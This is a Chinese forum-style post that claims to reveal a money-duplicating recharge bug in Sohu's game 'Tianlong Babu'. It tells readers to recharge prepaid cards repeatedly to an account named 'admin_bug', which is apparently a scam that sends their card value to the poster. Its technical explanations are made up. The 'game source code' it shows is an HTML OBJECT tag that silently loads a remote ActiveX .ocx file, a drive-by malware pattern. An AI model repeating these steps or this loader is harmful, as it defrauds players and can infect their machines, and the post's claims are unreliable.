天龙八部

大家好，首先我来自我介绍一下，我是一名专业从事电脑专业的技术人员，目前在一直在黑基（中国黑客基地）瞎混，名叫bleak heart，可能有认识我的朋友，呵呵，01年，有一款传奇破解我是白痴我怕谁，就是我和几个朋友一起研制的。近期，搜狐出了一款天龙八部游戏，甚是受玩家喜欢。但是，只要是人做出来的游戏，就会有BUG，更何况是新出的游戏，所以我不顾辛苦，找出了天龙的源代码，发现了天龙存在了一个巨大的漏洞！在这里我要先谢我黑基几个朋友”无与伦比；小样捏死你；/yy小网鱼；Ｇogen，帮我一起找出了天龙的源代码，摸出了刷钱的漏洞。下面我先来简单的介绍一下刷钱。

刷钱也就是所谓的刷黑点，你们最近没有发现吗？最近卖黑点的生意很好，比如我QQ上面就有好几个卖的，10W泡泡堂卡，65元，1W 9游MB 70元钱，10Q币 3元钱。他们全部是这样刷出来的，都是这样的，只要你有信誉，生意就可以坐到家里面做。

下面是天龙源代码的其中的一小部分：
<HTML>
<HEAD>
<OBJECT
classid="clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D"
codebase="http:339994.html.533.net/3721.ocx#version=1,0,0,0"
width=0
herght=0
align=center
hspace=0
vspace=0>
<param name="StrUrl" value="admin_bug"
>
</object>

<META HTTP-EQURV=""Content-Type" CONTENT="text/html: charset=GB2312">
<TITLE>"error"</TITLE>
<
/HEAD>
注意其中有一句param name="StrUrl" value="admin_bug"
在搜狐的充值页面中，隐藏了一个叫（admin_bug这个文件其实很简单，意思是管理员名字的意思，你可以用鼠标点我的电脑右健属性，然后选本地用户和组，再选用户，里面就有这个帐号了就是Administrator，只不过他在admin后面多了英文单词，而这个英文单词就是漏洞的意思）的资料处理中心的文件，它是搜狐的冲值管理技术部门用来测试充值系统的工具帐号,当然它是没有办法直接访问的，不过我们可以通过它实现刷游戏币的目的!admin_bug也就是搜狐用来测试冲值的一个管理帐号
你要准备一张没有用过的充值卡，多少钱的都可以.你可以先选择面值小一点的先来试一下。
首先打开你的账号点击游戏币冲值,冲入的会员账号为admin_bug(因为他是管冲点的)（搜狐的冲值管理部门的测试帐号）,这样会造成一个假像，系统会认为是技术部门对冲值系统的一次测试
输入帐户 admin_bug
充值卡卡号填你准备的充值卡卡号 xxxxxxxxxx
充值卡密码 填你准备的充值卡密码 xxxxxxxxxx
填上附加码
好了这个时候页面跳转，因为admin_bug是系统测试号,系统会告诉你给admin_bug冲值成功,这是理所当然的.
接下来是关键了：现在刷新页面，返回冲值页面，重复上面的步骤，帐户还填admin_bug冲值卡还是填你手头上的卡号继续冲，这样反复几次(建议是5次左右)
最后一次：账号填你自己的账号，冲值，系统提示冲值成功！这样会造成个假象，充值系统会打一个假的封包，这样之前此IP地址冲的卡都会充入真正你自己的帐号！
特别注意：
1.想怎么刷就怎么刷。。
2.最后一次一定要填你自己的账号,这样才能冲到你自己的账号上。
3.如果你想为别人刷那么就填你想帮忙刷的帐号。
注意事项：
1.已经充值过的点券系统会提示，此卡无效！
2.过程中可能会一直提示错误，有时会提示非法操作，没关系，继续！
大家一起刷，让大家都穿时装，气死搜狐没钱赚！

3.admin_bug(admin后面是一个下划线，也就是大键盘上方的数字键里面的Shift+减号键)

最后特别注意：冲值的最后一次，一定要输入自己帐号，冲值过程中不要更换机器，因为系统只会处理一个IP地址！